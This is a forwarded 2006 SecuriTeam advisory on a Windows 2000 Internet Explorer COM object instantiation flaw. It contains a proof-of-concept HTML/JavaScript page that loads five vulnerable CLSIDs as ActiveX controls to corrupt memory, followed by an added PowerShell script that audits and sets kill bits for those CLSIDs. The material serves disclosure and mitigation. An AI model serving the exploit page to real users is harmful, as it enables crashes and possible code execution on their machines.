Thread-topic: [NT] Windows 2000 Multiple COM Object Instantiation Vulnerability
> -----Original Message-----
> From: SecuriTeam [mailto:support@xxxxxxxxxxxxxx]
> Sent: Tuesday, August 22, 2006 7:46 PM
> To: html-list@xxxxxxxxxxxxxx
> Subject: [NT] Windows 2000 Multiple COM Object Instantiation
> Vulnerability
> - - - - - - - - -
>
>
>
> Windows 2000 Multiple COM Object Instantiation Vulnerability
>
>
>
> Multiple vulnerabilities have been found in Windows 2000: when
> Internet Explorer tries to instantiate the ciodm.dll,
> MyInfo.dll, msdxm.ocx or Creator.dll (Media Player 9) COM
> objects as ActiveX controls, it may corrupt system memory in
> such a way that an attacker may cause a DoS and possibly
> execute arbitrary code.
>
>
> Vulnerable Systems:
> * Windows 2000 with Internet Explorer 6.0 SP1
>
> Exploit:
> <!--
>
> // Windows 2000 Multiple COM Object Instantiation Vulnerability
> // tested on Windows 2000 SP4 CN
>
> // http://www.xsec.org
> // nop (nop#xsec.org)
>
> -->
> <html>
> <head>
> <title>COM-tester</title>
> </head>
> <body>
> <script>
> var i =0;
> var clsid = new Array(
>
> // NO: 1
> // CLSID: {3BC4F3A3-652A-11D1-B4D4-00C04FC2DB8D}
> // Info: Microsoft Index Server Catalog Administration Object
> // ProgID: Microsoft.ISCatAdm.1
> // InprocServer32: C:\WINNT\system32\ciodm.dll
> "{3BC4F3A3-652A-11D1-B4D4-00C04FC2DB8D}",
>
> // NO: 2
> // CLSID: {4682C82A-B2FF-11D0-95A8-00A0C92B77A9}
> // Info: MyInfo ASP Component
> // ProgID: MSWC.MyInfo.1
> // InprocServer32: C:\WINNT\system32\inetsrv\MyInfo.dll
> "{4682C82A-B2FF-11D0-95A8-00A0C92B77A9}",
>
>
> // NO: 3
> // CLSID: {8E71888A-423F-11D2-876E-00A0C9082467}
> // Info: RadioServer Class
> // ProgID: Mmedia.RadioServer.1
> // InprocServer32: C:\WINNT\system32\msdxm.ocx
> "{8E71888A-423F-11D2-876E-00A0C9082467}",
>
>
> // NO: 4 media player?
> // CLSID: {606EF130-9852-11D3-97C6-0060084856D4}
> // Info: CdCreator Class
> // ProgID: Creator.CdCreator.1
> // InprocServer32: C:\Program Files\Common Files\Adaptec Shared\CreatorAPI\creator.dll
> "{606EF130-9852-11D3-97C6-0060084856D4}",
>
> // NO: 5 media player?
> // CLSID: {F849164D-9863-11D3-97C6-0060084856D4}
> // Info: CdDevice Class
> // ProgID: Creator.CdDevice.1
> // InprocServer32: C:\Program Files\Common Files\Adaptec Shared\CreatorAPI\creator.dll
> "{F849164D-9863-11D3-97C6-0060084856D4}",
>
> // END
> null
> );
>
> while(clsid[i])
> {
> var a = document.createElement("object");
>
> window.status = "Testing Object " + clsid[i] + "...";
>
> a.setAttribute("classid", "clsid:" + clsid[i]);
>
> i++;
> }
>
> window.status = "failed!";
>
> </script>
> </body>
> </html>
>
>
> Additional Information:
> The information has been provided by nop <mailto:nop@xxxxxxxx>.
> The original article can be found at:
> http://www.xsec.org/index.php?module=Releases&act=view&type=1&id=16
>
>
> ================================================================================
>
>
> This bulletin is sent to members of the SecuriTeam mailing list.
> To unsubscribe from the list, send mail with an empty subject
> line and body to: html-list-unsubscribe@xxxxxxxxxxxxxx
> In order to subscribe to the mailing list and receive
> advisories in HTML format, simply forward this email to:
> html-list-subscribe@xxxxxxxxxxxxxx
>
>
>
> ================================================================================
> ================================================================================
>
> DISCLAIMER:
> The information in this bulletin is provided "AS IS" without
> warranty of any kind.
> In no event shall we be liable for any damages whatsoever
> including direct, indirect, incidental, consequential, loss
> of business profits or special damages.
>
>
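The standard IE-side mitigation for this class of bug is the ActiveX kill bit: bit 0x400 of the "Compatibility Flags" DWORD under HKLM\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{CLSID} stops IE from instantiating that CLSID at all. The script below is an added example, not part of the advisory or the xsec.org release; it audits (and, on request, sets) the kill bit for the five CLSIDs quoted above, and the variable and function names are its own.

```powershell
# Added example: audit / set the IE kill bit for the CLSIDs listed in the advisory.
# $Clsids and the function names are this example's own, not from the advisory.
$Clsids = @(
    '{3BC4F3A3-652A-11D1-B4D4-00C04FC2DB8D}',  # ciodm.dll (Index Server catalog admin)
    '{4682C82A-B2FF-11D0-95A8-00A0C92B77A9}',  # MyInfo.dll (MSWC.MyInfo)
    '{8E71888A-423F-11D2-876E-00A0C9082467}',  # msdxm.ocx (RadioServer)
    '{606EF130-9852-11D3-97C6-0060084856D4}',  # creator.dll (CdCreator)
    '{F849164D-9863-11D3-97C6-0060084856D4}'   # creator.dll (CdDevice)
)

$KillBit  = 0x400   # documented "kill bit" in Compatibility Flags
$BasePath = 'HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility'

# Returns one object per CLSID with the current flags and whether the kill bit is set.
function Get-KillBitStatus {
    param([string[]]$ClsidList)
    foreach ($id in $ClsidList) {
        $key   = Join-Path $BasePath $id
        $flags = 0
        if (Test-Path $key) {
            $val = Get-ItemProperty -Path $key -Name 'Compatibility Flags' -ErrorAction SilentlyContinue
            if ($val) { $flags = [int]$val.'Compatibility Flags' }
        }
        [pscustomobject]@{
            Clsid   = $id
            Flags   = ('0x{0:X}' -f $flags)
            KillBit = (($flags -band $KillBit) -ne 0)
        }
    }
}

# Sets the kill bit while preserving any other compatibility flags already present.
# Requires an elevated shell because it writes under HKLM.
function Set-KillBit {
    param([string[]]$ClsidList)
    foreach ($id in $ClsidList) {
        $key = Join-Path $BasePath $id
        if (-not (Test-Path $key)) { New-Item -Path $key -Force | Out-Null }
        $current = (Get-ItemProperty -Path $key -Name 'Compatibility Flags' -ErrorAction SilentlyContinue).'Compatibility Flags'
        $new = ([int]$current) -bor $KillBit
        Set-ItemProperty -Path $key -Name 'Compatibility Flags' -Value $new -Type DWord
    }
}

# Report first; call Set-KillBit $Clsids from an elevated shell to apply.
Get-KillBitStatus $Clsids | Format-Table -AutoSize
```

On 64-bit Windows the 32-bit IE reads the same key under HKLM:\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility, so audit both hives. A kill bit only blocks instantiation from IE; the DLLs themselves remain loadable by other COM clients.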